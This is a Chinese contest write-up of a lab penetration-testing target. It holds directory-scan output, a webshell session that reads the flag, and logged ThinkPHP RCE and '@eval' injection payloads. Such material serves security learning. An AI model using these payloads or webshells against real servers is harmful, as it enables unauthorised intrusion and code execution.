2024年“羊城杯”粤港澳大湾区网络安全大赛决赛靶标Writeup
2024年“羊城杯”粤港澳大湾区网络安全大赛决赛Writeup
平台地址:10.1.2.10
渗透测试
有用信息搜集
zhaopin@yangchengsz.com
admin@yangcheng.com
目录扫描
目录探测
[09:27:56] Starting:
[09:27:58] 200 - 6KB - /.DS_Store
[09:28:00] 403 - 297B - /.ht_wsr.txt
[09:28:00] 403 - 300B - /.htaccess.orig
[09:28:00] 403 - 300B - /.htaccess.bak1
[09:28:00] 403 - 301B - /.htaccess_extra
[09:28:00] 403 - 302B - /.htaccess.sample
[09:28:00] 403 - 300B - /.htaccess.save
[09:28:00] 403 - 300B - /.htaccess_orig
[09:28:00] 200 - 4KB - /%3f/
[09:28:00] 403 - 298B - /.htaccessOLD
[09:28:00] 403 - 298B - /.htaccess_sc
[09:28:00] 403 - 298B - /.htaccessBAK
[09:28:00] 403 - 290B - /.htm
[09:28:00] 403 - 299B - /.htaccessOLD2
[09:28:00] 403 - 300B - /.htpasswd_test
[09:28:00] 403 - 297B - /.httr-oauth
[09:28:00] 403 - 291B - /.html
[09:28:00] 403 - 296B - /.htpasswds
[09:28:06] 200 - 4KB - /0
[09:28:11] 302 - 0B - /Admin -> /login.html
[09:28:11] 302 - 0B - /ADMIN -> /login.html
[09:28:11] 302 - 0B - /admin -> /login.html
[09:28:11] 302 - 0B - /admin.html -> /login.html
[09:28:11] 302 - 0B - /Admin.html -> /login.html
[09:28:12] 302 - 0B - /ADMIN.html -> /login.html
[09:28:12] 404 - 7KB - /admin/account.js
[09:28:12] 404 - 7KB - /admin/account.jsp
[09:28:12] 404 - 7KB - /admin/account.php
[09:28:12] 404 - 7KB - /admin/access.txt
[09:28:12] 404 - 7KB - /admin/account.aspx
[09:28:12] 404 - 7KB - /admin/account.html
[09:28:12] 404 - 7KB - /admin/account
[09:28:12] 404 - 7KB - /admin/access.log
[09:28:12] 404 - 7KB - /admin/access_log
[09:28:12] 404 - 7KB - /admin/admin
[09:28:12] 302 - 0B - /admin/ -> /login.html
[09:28:12] 302 - 0B - /Admin/ -> /login.html
[09:28:12] 404 - 7KB - /admin/admin.php
[09:28:12] 404 - 7KB - /admin/admin_login
[09:28:12] 404 - 7KB - /admin/admin_login.html
[09:28:12] 404 - 7KB - /admin/admin.aspx
[09:28:12] 404 - 7KB - /admin/admin_login.aspx
[09:28:12] 404 - 7KB - /admin/admin.js
[09:28:12] 404 - 7KB - /admin/admin_login.jsp
[09:28:12] 404 - 7KB - /admin/adminLogin.aspx
[09:28:12] 404 - 7KB - /admin/backup/
[09:28:12] 404 - 7KB - /admin/admin.html
[09:28:12] 404 - 7KB - /admin/admin_login.js
[09:28:12] 404 - 7KB - /admin/admin_login.php
[09:28:12] 404 - 7KB - /admin/admin/login
[09:28:12] 404 - 7KB - /admin/adminer.php
[09:28:12] 404 - 7KB - /admin/adminLogin.js
[09:28:12] 404 - 7KB - /admin/admin.jsp
[09:28:12] 404 - 7KB - /admin/adminLogin.html
[09:28:12] 404 - 7KB - /admin/config.php
[09:28:12] 404 - 7KB - /admin/backups/
[09:28:12] 404 - 7KB - /admin/adminLogin.jsp
[09:28:12] 404 - 7KB - /admin/adminLogin
[09:28:12] 404 - 7KB - /admin/controlpanel.aspx
[09:28:12] 404 - 7KB - /admin/controlpanel
[09:28:12] 404 - 7KB - /admin/adminLogin.php
[09:28:12] 404 - 7KB - /admin/controlpanel.php
[09:28:12] 404 - 7KB - /admin/controlpanel.html
[09:28:12] 404 - 7KB - /admin/controlpanel.js
[09:28:12] 404 - 7KB - /admin/controlpanel.jsp
[09:28:12] 404 - 7KB - /admin/cp.aspx
[09:28:12] 404 - 7KB - /admin/cp
[09:28:12] 404 - 7KB - /admin/cp.jsp
[09:28:12] 404 - 7KB - /admin/cp.html
[09:28:12] 404 - 7KB - /admin/default/login.asp
[09:28:12] 404 - 7KB - /admin/error.log
[09:28:12] 404 - 7KB - /admin/cp.php
[09:28:12] 404 - 7KB - /admin/data/autosuggest
[09:28:12] 404 - 7KB - /admin/db/
[09:28:12] 404 - 7KB - /admin/error_log
[09:28:12] 404 - 7KB - /admin/default.asp
[09:28:12] 404 - 7KB - /admin/cp.js
[09:28:12] 404 - 7KB - /admin/download.php
[09:28:12] 404 - 7KB - /admin/default/admin.asp
[09:28:12] 404 - 7KB - /admin/error.txt
[09:28:12] 404 - 7KB - /admin/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php
[09:28:12] 404 - 7KB - /admin/fckeditor/editor/filemanager/connectors/aspx/connector.aspx
[09:28:12] 404 - 7KB - /admin/export.php
[09:28:12] 404 - 7KB - /admin/errors.log
[09:28:12] 404 - 7KB - /admin/dumper/
[09:28:12] 404 - 7KB - /admin/default
[09:28:12] 404 - 7KB - /admin/files.php
[09:28:12] 404 - 7KB - /admin/heapdump
[09:28:12] 404 - 7KB - /admin/file.php
[09:28:12] 404 - 7KB - /admin/fckeditor/editor/filemanager/upload/asp/upload.asp
[09:28:12] 404 - 7KB - /admin/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx
[09:28:12] 404 - 7KB - /admin/fckeditor/editor/filemanager/upload/php/upload.php
[09:28:12] 404 - 7KB - /admin/fckeditor/editor/filemanager/upload/aspx/upload.aspx
[09:28:12] 404 - 7KB - /admin/fckeditor/editor/filemanager/connectors/php/connector.php
[09:28:12] 404 - 7KB - /admin/fckeditor/editor/filemanager/connectors/asp/upload.asp
[09:28:12] 404 - 7KB - /admin/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp
[09:28:12] 404 - 7KB - /admin/FCKeditor
[09:28:12] 404 - 7KB - /admin/fckeditor/editor/filemanager/connectors/php/upload.php
[09:28:12] 404 - 7KB - /admin/index.aspx
[09:28:12] 404 - 7KB - /admin/home
[09:28:12] 404 - 7KB - /admin/fckeditor/editor/filemanager/connectors/asp/connector.asp
[09:28:12] 404 - 7KB - /admin/index.php
[09:28:12] 404 - 7KB - /admin/fckeditor/editor/filemanager/connectors/aspx/upload.aspx
[09:28:12] 404 - 7KB - /admin/index.jsp
[09:28:12] 404 - 7KB - /admin/index.js
[09:28:12] 404 - 7KB - /admin/js/tiny_mce
[09:28:12] 404 - 7KB - /Admin/knowledge/dsmgr/users/UserManager.asp
[09:28:12] 404 - 7KB - /admin/home.jsp
[09:28:12] 404 - 7KB - /admin/home.php
[09:28:12] 404 - 7KB - /Admin/knowledge/dsmgr/users/GroupManager.asp
[09:28:12] 404 - 7KB - /admin/js/tinymce/
[09:28:12] 404 - 7KB - /admin/js/tiny_mce/
[09:28:12] 404 - 7KB - /admin/home.html
[09:28:12] 404 - 7KB - /admin/js/tinymce
[09:28:12] 404 - 7KB - /admin/home.aspx
[09:28:12] 404 - 7KB - /admin/log
[09:28:12] 404 - 7KB - /admin/log/error.log
[09:28:12] 404 - 7KB - /admin/includes/configure.php~
[09:28:12] 404 - 7KB - /admin/login.php
[09:28:12] 404 - 7KB - /admin/login.aspx
[09:28:12] 404 - 7KB - /admin/login.jsp
[09:28:12] 302 - 0B - /admin/index.html -> /login.html
[09:28:12] 404 - 7KB - /admin/login.py
[09:28:12] 404 - 7KB - /admin/home.js
[09:28:12] 404 - 7KB - /admin/login
[09:28:12] 404 - 7KB - /admin/login.asp
[09:28:12] 302 - 0B - /admin/index -> /login.html
[09:28:12] 404 - 7KB - /admin/login.htm
[09:28:12] 404 - 7KB - /admin/logs/access-log
[09:28:12] 404 - 7KB - /admin/login.js
[09:28:12] 404 - 7KB - /admin/logs/
[09:28:12] 404 - 7KB - /admin/login.html
[09:28:12] 404 - 7KB - /Admin/login/
[09:28:12] 404 - 7KB - /admin/login.rb
[09:28:13] 404 - 7KB - /admin/login.do
[09:28:13] 404 - 7KB - /admin/logs/access.log
[09:28:13] 404 - 7KB - /admin/manage.asp
[09:28:13] 404 - 7KB - /admin/logs/access_log
[09:28:13] 404 - 7KB - /admin/logs/error.log
[09:28:13] 404 - 7KB - /admin/mysql/
[09:28:13] 404 - 7KB - /admin/mysql2/index.php
[09:28:13] 404 - 7KB - /admin/mysql/index.php
[09:28:13] 404 - 7KB - /admin/phpmyadmin/index.php
[09:28:13] 404 - 7KB - /admin/logs/error_log
[09:28:13] 404 - 7KB - /admin/logon.jsp
[09:28:13] 404 - 7KB - /admin/logs/login.txt
[09:28:13] 404 - 7KB - /admin/logs/error-log
[09:28:13] 404 - 7KB - /admin/logs/err.log
[09:28:13] 404 - 7KB - /admin/pMA/
[09:28:13] 404 - 7KB - /admin/phpmyadmin2/index.php
[09:28:13] 404 - 7KB - /admin/phpMyAdmin/
[09:28:13] 404 - 7KB - /admin/logs/errors.log
[09:28:13] 404 - 7KB - /admin/phpMyAdmin/index.php
[09:28:13] 404 - 7KB - /admin/manage/login.asp
[09:28:13] 404 - 7KB - /admin/manage
[09:28:13] 404 - 7KB - /admin/phpmyadmin/
[09:28:13] 404 - 7KB - /admin/manage/admin.asp
[09:28:13] 404 - 7KB - /admin/pma/
[09:28:13] 404 - 7KB - /admin/PMA/index.php
[09:28:13] 404 - 7KB - /admin/sxd/
[09:28:13] 404 - 7KB - /admin/phpMyAdmin
[09:28:13] 404 - 7KB - /admin/pol_log.txt
[09:28:13] 404 - 7KB - /admin/upload.php
[09:28:13] 404 - 7KB - /admin/uploads.php
[09:28:13] 404 - 7KB - /admin/tiny_mce
[09:28:13] 404 - 7KB - /admin/tinymce
[09:28:13] 404 - 7KB - /admin/signin
[09:28:13] 404 - 7KB - /admin/pma/index.php
[09:28:13] 404 - 7KB - /admin/sqladmin/
[09:28:13] 404 - 7KB - /admin/portalcollect.php?f=http://xxx&t=js
[09:28:13] 404 - 7KB - /admin/secure/logon.jsp
[09:28:13] 404 - 7KB - /admin/private/logs
[09:28:13] 404 - 7KB - /admin/release
[09:28:13] 404 - 7KB - /admin/web/
[09:28:13] 404 - 7KB - /admin/scripts/fckeditor
[09:28:13] 404 - 7KB - /admin/sysadmin/
[09:28:13] 404 - 7KB - /admin/user_count.txt
[09:28:13] 404 - 7KB - /admin/views/ajax/autocomplete/user/a
[09:28:21] 500 - 7KB - /ajax
[09:28:22] 403 - 297B - /application
[09:28:22] 403 - 321B - /application/configs/application.ini
[09:28:22] 403 - 298B - /application/
[09:28:22] 403 - 303B - /application/logs/
[09:28:22] 403 - 304B - /application/cache/
[09:28:23] 200 - 12MB - /archive.zip
[09:28:23] 200 - 3KB - /article/admin/admin.asp
[09:28:23] 200 - 3KB - /article/admin
[09:28:31] 301 - 309B - /data -> http://10.1.143.10/data/
[09:28:31] 403 - 291B - /data/
[09:28:37] 200 - 0B - /feed
[09:28:41] 302 - 0B - /index.php-bak -> /index.php/lost.html
[09:28:41] 302 - 0B - /index.php. -> /index.php/lost.html
[09:28:41] 302 - 0B - /index.php4 -> /index.php/lost.html
[09:28:41] 302 - 0B - /index.php5 -> /index.php/lost.html
[09:28:41] 302 - 0B - /index.php::$DATA -> /index.php/lost.html
[09:28:41] 302 - 0B - /index.php~ -> /index.php/lost.html
[09:28:41] 302 - 0B - /index.php.bak -> /index.php/lost.html
[09:28:41] 302 - 0B - /index.php3 -> /index.php/lost.html
[09:28:41] 200 - 4KB - /index.php
[09:28:41] 200 - 1KB - /index.php/login/
[09:28:41] 200 - 4KB - /index
[09:28:41] 302 - 0B - /install -> /index.html
[09:28:41] 302 - 0B - /install.html -> /index.html
[09:28:41] 302 - 0B - /Install -> /index.html
[09:28:41] 302 - 0B - /INSTALL.html -> /index.html
[09:28:41] 302 - 0B - /Install.html -> /index.html
[09:28:41] 302 - 0B - /INSTALL -> /index.html
[09:28:41] 302 - 0B - /INSTALL.HTML -> /index.html
[09:28:42] 404 - 7KB - /install/index.php?upgrade/
[09:28:42] 302 - 0B - /install/ -> /index.html
[09:28:42] 404 - 7KB - /install/update.log
[09:28:45] 404 - 7KB - /login/administrator/
[09:28:45] 404 - 7KB - /login/admin/
[09:28:45] 404 - 7KB - /login/admin/admin.asp
[09:28:45] 404 - 7KB - /login/cpanel/
[09:28:45] 404 - 7KB - /login/cpanel.js
[09:28:45] 404 - 7KB - /login/cpanel.aspx
[09:28:45] 404 - 7KB - /login/cpanel.php
[09:28:45] 404 - 7KB - /login/cpanel.jsp
[09:28:45] 404 - 7KB - /login/login
[09:28:45] 404 - 7KB - /login/super
[09:28:45] 404 - 7KB - /login/cpanel.html
[09:28:45] 404 - 7KB - /login/oauth/
[09:28:45] 200 - 1KB - /login
[09:28:45] 200 - 1KB - /login.html
[09:28:45] 200 - 1KB - /login/
[09:28:45] 200 - 1KB - /login/index
[09:28:49] 200 - 0B - /multimedia
[09:28:56] 404 - 7KB - /plugins
[09:28:57] 404 - 7KB - /plugins/editors/fckeditor
[09:28:57] 404 - 7KB - /plugins/upload.php
[09:28:57] 404 - 7KB - /plugins/tiny_mce/
[09:28:57] 404 - 7KB - /plugins/
[09:28:57] 404 - 7KB - /plugins/sfSWFUploadPlugin/web/sfSWFUploadPlugin/swf/swfupload.swf
[09:28:57] 404 - 7KB - /plugins/tinymce
[09:28:57] 404 - 7KB - /plugins/servlet/gadgets/makeRequest?url=https://google.com
[09:28:57] 404 - 7KB - /plugins/sfSWFUploadPlugin/web/sfSWFUploadPlugin/swf/swfupload_f9.swf
[09:28:57] 404 - 7KB - /plugins/servlet/gadgets/makeRequest
[09:28:57] 404 - 7KB - /plugins/tinymce/
[09:28:57] 404 - 7KB - /plugins/servlet/oauth/users/icon
[09:28:57] 404 - 7KB - /plugins/web.config
[09:28:57] 404 - 7KB - /plugins/tiny_mce
[09:28:57] 404 - 7KB - /plugins/fckeditor
[09:28:59] 301 - 311B - /public -> http://10.1.143.10/public/
[09:28:59] 403 - 293B - /public/
[09:29:00] 200 - 3KB - /reach/sip.svc
[09:29:01] 200 - 32B - /robots.txt
[09:29:01] 200 - 3KB - /rss
[09:29:01] 200 - 3KB - /rss.html
[09:29:02] 200 - 4KB - /Search
[09:29:02] 200 - 4KB - /search
[09:29:02] 200 - 4KB - /search.html
[09:29:02] 403 - 299B - /server-status
[09:29:02] 403 - 300B - /server-status/
[09:29:05] 200 - 1KB - /sitemap
[09:29:13] 302 - 0B - /user/ -> /login.html
[09:29:13] 302 - 0B - /user.html -> /login.html
[09:29:13] 302 - 0B - /user -> /login.html
[09:29:13] 500 - 7KB - /user/login.html
[09:29:13] 500 - 7KB - /user/login.js
[09:29:13] 500 - 7KB - /user/login/
[09:29:13] 500 - 7KB - /user/login.jsp
[09:29:13] 500 - 7KB - /user/admin.php
[09:29:13] 500 - 7KB - /user/signup
[09:29:13] 500 - 7KB - /user/login.php
[09:29:13] 302 - 0B - /user/0 -> /login.html
[09:29:13] 500 - 7KB - /user/login.aspx
[09:29:13] 500 - 7KB - /user/admin
[09:29:14] 403 - 293B - /vendor/
[09:29:14] 200 - 0B - /vendor/composer/autoload_classmap.php
[09:29:14] 200 - 0B - /vendor/composer/autoload_psr4.php
[09:29:14] 200 - 0B - /vendor/composer/autoload_namespaces.php
[09:29:14] 200 - 0B - /vendor/composer/autoload_files.php
[09:29:14] 200 - 0B - /vendor/composer/ClassLoader.php
[09:29:14] 200 - 51KB - /vendor/composer/installed.json
[09:29:14] 200 - 1KB - /vendor/composer/LICENSE
[09:29:14] 200 - 0B - /vendor/composer/autoload_real.php
[09:29:14] 200 - 0B - /vendor/composer/autoload_static.php木马
全端口扫描发现开放的tp
http://10.1.143.10:35007/cmd.php
密码是1
thinkphp打一个RCE漏洞,直接上马写个哥斯拉连接
http://10.1.143.10:35007/bak.php
获取系统权限后,扫描到的可疑webshell。内网信息
/var/www/html/public/ >dir c
404.html faq.html index.php router.php team.html
about.html favicon.ico js s.php testimonial.html
bak.php feature.html lib scss
contact.html img project.html service.html
css index.html robots.txt static
/var/www/html/public/ >cat /flag
/var/www/html/public/ >cd ..
\var\www\html/ >ls
404.html
about.html
bak.php
contact.html
css
faq.html
favicon.ico
feature.html
img
index.html
index.php
js
lib
project.html
robots.txt
router.php
s.php
scss
service.html
static
team.html
testimonial.html
\var\www\html/ >cd ..
\var\www/ >cd ..
\var/ >cd ..
\/ >dir
bin dev flag1 lib media opt root sbin sys usr
boot etc home lib64 mnt proc run srv tmp var
\/ >tac flag1
flag{e09fa9d6cc4050d8c7ac34fb6a247a2a}
\/ >d
\/ >
\/ >dir
bin dev flag1 lib media opt root sbin sys usr
boot etc home lib64 mnt proc run srv tmp var
\/ >cd /
/ >cd /flag
/flag/ >dir
404.html faq.html index.php router.php team.html
about.html favicon.ico js s.php testimonial.html
bak.php feature.html lib scss
contact.html img project.html service.html
css index.html robots.txt static
/flag/ >find / -name flag*
/proc/sys/kernel/sched_domain/cpu0/domain0/flags
/proc/sys/kernel/sched_domain/cpu1/domain0/flags
/proc/sys/kernel/sched_domain/cpu2/domain0/flags
/sys/devices/platform/serial8250/tty/ttyS15/flags
/sys/devices/platform/serial8250/tty/ttyS6/flags
/sys/devices/platform/serial8250/tty/ttyS23/flags
/sys/devices/platform/serial8250/tty/ttyS13/flags
/sys/devices/platform/serial8250/tty/ttyS31/flags
/sys/devices/platform/serial8250/tty/ttyS4/flags
/sys/devices/platform/serial8250/tty/ttyS21/flags
/sys/devices/platform/serial8250/tty/ttyS11/flags
/sys/devices/platform/serial8250/tty/ttyS2/flags
/sys/devices/platform/serial8250/tty/ttyS28/flags
/sys/devices/platform/serial8250/tty/ttyS0/flags
/sys/devices/platform/serial8250/tty/ttyS18/flags
/sys/devices/platform/serial8250/tty/ttyS9/flags
/sys/devices/platform/serial8250/tty/ttyS26/flags
/sys/devices/platform/serial8250/tty/ttyS16/flags
/sys/devices/platform/serial8250/tty/ttyS7/flags
/sys/devices/platform/serial8250/tty/ttyS24/flags
/sys/devices/platform/serial8250/tty/ttyS14/flags
/sys/devices/platform/serial8250/tty/ttyS5/flags
/sys/devices/platform/serial8250/tty/ttyS22/flags
/sys/devices/platform/serial8250/tty/ttyS12/flags
/sys/devices/platform/serial8250/tty/ttyS30/flags
/sys/devices/platform/serial8250/tty/ttyS3/flags
/sys/devices/platform/serial8250/tty/ttyS20/flags
/sys/devices/platform/serial8250/tty/ttyS10/flags
/sys/devices/platform/serial8250/tty/ttyS29/flags
/sys/devices/platform/serial8250/tty/ttyS1/flags
/sys/devices/platform/serial8250/tty/ttyS19/flags
/sys/devices/platform/serial8250/tty/ttyS27/flags
/sys/devices/platform/serial8250/tty/ttyS17/flags
/sys/devices/platform/serial8250/tty/ttyS8/flags
/sys/devices/platform/serial8250/tty/ttyS25/flags
/sys/devices/virtual/net/eth0/flags
/sys/devices/virtual/net/lo/flags
/sys/devices/virtual/net/eth1/flags
/flag1
/flag/ >tac /flag1
flag{e09fa9d6cc4050d8c7ac34fb6a247a2a}
/flag/ >ps -aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.0 250304 3136 ? Ss Sep10 0:03 apache2 -DFOREGROUND
www-data 43 1.2 0.1 251004 10772 ? S 10:43 0:06 apache2 -DFOREGROUND
www-data 67 1.2 0.1 252532 11708 ? S 10:43 0:06 apache2 -DFOREGROUND
www-data 69 1.5 0.1 252540 12100 ? S 10:43 0:08 apache2 -DFOREGROUND
www-data 71 1.1 0.1 252532 11648 ? S 10:43 0:06 apache2 -DFOREGROUND
www-data 72 1.0 0.1 252540 11736 ? S 10:44 0:05 apache2 -DFOREGROUND
www-data 80 0.9 0.1 250996 10784 ? S 10:44 0:05 apache2 -DFOREGROUND
www-data 81 1.0 0.1 252540 11708 ? S 10:44 0:05 apache2 -DFOREGROUND
www-data 82 1.2 0.1 251004 10860 ? S 10:44 0:06 apache2 -DFOREGROUND
www-data 83 1.0 0.1 252532 11728 ? S 10:44 0:05 apache2 -DFOREGROUND
www-data 87 0.9 0.2 252532 14376 ? S 10:44 0:05 apache2 -DFOREGROUND
www-data 94 1.0 0.1 252540 11780 ? S 10:44 0:05 apache2 -DFOREGROUND
www-data 97 0.9 0.1 252532 11676 ? S 10:44 0:05 apache2 -DFOREGROUND
www-data 100 1.3 0.1 250740 10364 ? S 10:44 0:06 apache2 -DFOREGROUND
www-data 110 1.4 0.1 250740 10348 ? S 10:45 0:06 apache2 -DFOREGROUND
www-data 115 1.6 0.1 250996 10760 ? S 10:45 0:07 apache2 -DFOREGROUND
www-data 118 1.4 0.1 250996 10660 ? S 10:45 0:06 apache2 -DFOREGROUND
www-data 119 1.1 0.1 251004 10856 ? S 10:45 0:05 apache2 -DFOREGROUND
www-data 121 0.9 0.2 254720 17100 ? S 10:45 0:04 apache2 -DFOREGROUND
www-data 122 1.4 0.1 252532 11692 ? S 10:45 0:06 apache2 -DFOREGROUND
www-data 123 1.0 0.1 251004 10736 ? S 10:45 0:04 apache2 -DFOREGROUND
www-data 124 1.3 0.1 250996 10756 ? S 10:45 0:06 apache2 -DFOREGROUND
www-data 126 1.0 0.1 250996 10612 ? S 10:45 0:05 apache2 -DFOREGROUND
www-data 133 1.3 0.1 252532 12188 ? S 10:45 0:06 apache2 -DFOREGROUND
www-data 135 0.9 0.1 252540 12032 ? S 10:45 0:04 apache2 -DFOREGROUND
www-data 136 2.0 0.2 254728 16792 ? S 10:45 0:09 apache2 -DFOREGROUND
www-data 137 1.1 0.1 250484 10184 ? S 10:45 0:05 apache2 -DFOREGROUND
www-data 139 1.1 0.1 252540 11688 ? S 10:45 0:05 apache2 -DFOREGROUND
www-data 140 1.0 0.1 252532 11672 ? S 10:45 0:04 apache2 -DFOREGROUND
www-data 147 1.2 0.1 250996 10980 ? S 10:45 0:05 apache2 -DFOREGROUND
www-data 149 1.1 0.2 254728 17092 ? S 10:45 0:04 apache2 -DFOREGROUND
www-data 152 1.1 0.2 254720 16580 ? S 10:45 0:04 apache2 -DFOREGROUND
www-data 153 1.3 0.1 252540 12044 ? S 10:45 0:05 apache2 -DFOREGROUND
www-data 168 1.4 0.1 252532 11656 ? S 10:46 0:06 apache2 -DFOREGROUND
www-data 179 1.3 0.1 251004 10860 ? S 10:46 0:05 apache2 -DFOREGROUND
www-data 191 1.2 0.1 252540 11976 ? S 10:46 0:05 apache2 -DFOREGROUND
www-data 199 1.1 0.2 252540 14336 ? S 10:46 0:04 apache2 -DFOREGROUND
www-data 202 1.2 0.1 252532 11696 ? S 10:46 0:05 apache2 -DFOREGROUND
www-data 204 1.2 0.1 252532 11872 ? S 10:46 0:05 apache2 -DFOREGROUND
www-data 207 1.2 0.1 252532 12052 ? S 10:46 0:05 apache2 -DFOREGROUND
www-data 210 1.1 0.1 252540 11800 ? S 10:46 0:04 apache2 -DFOREGROUND
www-data 211 1.3 0.2 254720 17132 ? S 10:46 0:05 apache2 -DFOREGROUND
www-data 212 1.2 0.1 252532 11712 ? S 10:46 0:05 apache2 -DFOREGROUND
www-data 214 1.3 0.1 252532 11712 ? S 10:46 0:05 apache2 -DFOREGROUND
www-data 222 1.2 0.1 252532 12076 ? S 10:46 0:04 apache2 -DFOREGROUND
www-data 224 1.1 0.1 252532 11668 ? S 10:46 0:04 apache2 -DFOREGROUND
www-data 226 1.1 0.1 252532 11836 ? S 10:46 0:04 apache2 -DFOREGROUND
www-data 228 1.3 0.1 252540 11956 ? S 10:46 0:05 apache2 -DFOREGROUND
www-data 229 1.4 0.1 250740 10532 ? S 10:46 0:05 apache2 -DFOREGROUND
www-data 230 1.3 0.1 252532 11844 ? S 10:46 0:05 apache2 -DFOREGROUND
www-data 231 1.6 0.1 252532 11988 ? S 10:46 0:06 apache2 -DFOREGROUND
www-data 233 1.0 0.1 252532 11964 ? S 10:46 0:04 apache2 -DFOREGROUND
www-data 234 1.2 0.1 252532 11764 ? S 10:46 0:04 apache2 -DFOREGROUND
www-data 236 1.2 0.1 252540 11780 ? S 10:46 0:05 apache2 -DFOREGROUND
www-data 239 1.5 0.1 251004 10728 ? S 10:47 0:05 apache2 -DFOREGROUND
www-data 244 1.5 0.1 252532 11692 ? S 10:47 0:04 apache2 -DFOREGROUND
www-data 246 1.9 0.1 250740 10372 ? S 10:47 0:06 apache2 -DFOREGROUND
www-data 247 0.9 0.2 250740 12812 ? S 10:48 0:02 apache2 -DFOREGROUND
www-data 248 2.0 0.1 252540 11804 ? S 10:48 0:05 apache2 -DFOREGROUND
www-data 250 1.6 0.1 250996 10620 ? S 10:48 0:04 apache2 -DFOREGROUND
www-data 253 1.2 0.1 252532 11868 ? S 10:48 0:03 apache2 -DFOREGROUND
www-data 256 0.8 0.2 254796 17468 ? R 10:49 0:01 apache2 -DFOREGROUND
www-data 258 1.2 0.1 252588 12124 ? R 10:49 0:02 apache2 -DFOREGROUND
www-data 263 1.1 0.1 250740 10360 ? S 10:49 0:02 apache2 -DFOREGROUND
www-data 266 0.9 0.1 252540 11952 ? S 10:49 0:01 apache2 -DFOREGROUND
www-data 268 0.9 0.1 250740 10300 ? S 10:49 0:01 apache2 -DFOREGROUND
www-data 269 0.9 0.1 252540 12088 ? S 10:49 0:01 apache2 -DFOREGROUND
www-data 271 2.4 0.1 252544 12168 ? S 10:49 0:04 apache2 -DFOREGROUND
www-data 272 1.0 0.1 252532 11612 ? S 10:49 0:02 apache2 -DFOREGROUND
www-data 276 1.0 0.1 250732 10308 ? S 10:49 0:02 apache2 -DFOREGROUND
www-data 279 1.0 0.1 250732 10300 ? S 10:49 0:02 apache2 -DFOREGROUND
www-data 295 1.0 0.1 250732 10368 ? S 10:50 0:01 apache2 -DFOREGROUND
www-data 298 2.1 0.1 251764 11224 ? R 10:51 0:02 apache2 -DFOREGROUND
www-data 299 1.5 0.1 252532 11732 ? S 10:51 0:01 apache2 -DFOREGROUND
www-data 300 0.8 0.1 250996 10780 ? S 10:51 0:00 apache2 -DFOREGROUND
www-data 302 0.7 0.1 252532 11820 ? S 10:51 0:00 apache2 -DFOREGROUND
www-data 303 2.2 0.1 252532 11728 ? S 10:51 0:02 apache2 -DFOREGROUND
www-data 304 1.0 0.2 253184 15900 ? S 10:51 0:01 apache2 -DFOREGROUND
www-data 305 0.7 0.1 250756 10644 ? S 10:51 0:00 apache2 -DFOREGROUND
www-data 306 1.2 0.2 254720 16504 ? S 10:51 0:01 apache2 -DFOREGROUND
www-data 307 0.8 0.2 254720 16484 ? S 10:51 0:00 apache2 -DFOREGROUND
www-data 308 0.9 0.1 250740 10340 ? S 10:51 0:00 apache2 -DFOREGROUND
www-data 309 0.6 0.1 250740 10332 ? S 10:51 0:00 apache2 -DFOREGROUND
www-data 310 0.2 0.2 254720 16456 ? S 10:51 0:00 apache2 -DFOREGROUND
www-data 311 0.6 0.1 252532 11816 ? S 10:51 0:00 apache2 -DFOREGROUND
www-data 312 1.0 0.1 250740 10244 ? S 10:51 0:01 apache2 -DFOREGROUND
www-data 325 0.0 0.0 4292 744 ? S 10:52 0:00 sh -c cd /flag/;ps -aux
www-data 326 0.0 0.0 36640 2752 ? R 10:52 0:00 ps -aux
/flag/ >cd /var/www/html
/var/www/html/ >grep -r "eval"
runtime/log/202409/1726051532-11.log:[ 2024-09-11T18:44:34+08:00 ] 192.168.54.130 10.50.143.12 GET /.mweval_history
runtime/log/202409/1726051532-11.log:[ log ] 10.1.143.10:35007/.mweval_history [运行时间:0.016985s][吞吐率:58.87req/s] [内存消耗:1,311.47kb] [文件加载:27]
runtime/log/202409/1726051532-11.log: 0 => '.mweval_history',
runtime/log/202409/1726051591-11.log:[ 2024-09-11T18:46:14+08:00 ] 192.168.54.130 10.50.143.29 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
runtime/log/202409/1726051591-11.log:[ log ] 10.1.143.10:35007/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php [运行时间:0.273526s][吞吐率:3.66req/s] [内存消耗:1,312.61kb] [文件加载:27]
runtime/log/202409/1726051591-11.log: 'PHP' => 'eval-stdin.php',
runtime/log/202409/1726051591-11.log:[ 2024-09-11T18:46:15+08:00 ] 192.168.54.130 10.50.143.29 GET /comment/api/index.php?gid=1&page=2&rlist[]=*hex/@eval($_GET[_])%3B%3F%3E
runtime/log/202409/1726051591-11.log:[ log ] 10.1.143.10:35007/comment/api/index.php?gid=1&page=2&rlist[]=*hex/@eval($_GET[_])%3B%3F%3E [运行时间:0.030392s][吞吐率:32.90req/s] [内存消耗:1,312.45kb] [文件加载:27]
runtime/log/202409/1726051591-11.log: 0 => '*hex/@eval($_GET[_]);?>',
runtime/log/202409/1726051730-11.log:[ 2024-09-11T18:48:03+08:00 ] 192.168.54.130 10.50.143.18 GET /.mweval_history
runtime/log/202409/1726051730-11.log:[ log ] 10.1.143.10:35007/.mweval_history [运行时间:0.720367s][吞吐率:1.39req/s] [内存消耗:1,311.47kb] [文件加载:27]
runtime/log/202409/1726051730-11.log: 0 => '.mweval_history',
runtime/log/202409/1726051730-11.log:[ 2024-09-11T18:48:06+08:00 ] 192.168.54.130 10.50.143.12 GET /%3f//?s=captcha&test=-1%20Post:%20_method=__ConStruct&method=get&filter[]=call_user_func&get[0]=eval(%27ls%27)
runtime/log/202409/1726051730-11.log:[ log ] 10.1.143.10:35007/%3f//?s=captcha&test=-1%20Post:%20_method=__ConStruct&method=get&filter[]=call_user_func&get[0]=eval(%27ls%27) [运行时间:0.376378s][吞吐率:2.66req/s] [内存消耗:1,318.23kb] [文件加载:27]
runtime/log/202409/1726051730-11.log: 0 => 'eval(\'ls\')',
runtime/log/202409/1726051660-11.log:[ 2024-09-11T18:46:37+08:00 ] 192.168.54.130 10.50.143.5 GET /.mweval_history
runtime/log/202409/1726051660-11.log:[ log ] 10.1.143.10:35007/.mweval_history [运行时间:0.385728s][吞吐率:2.59req/s] [内存消耗:1,311.47kb] [文件加载:27]
runtime/log/202409/1726051660-11.log: 0 => '.mweval_history',
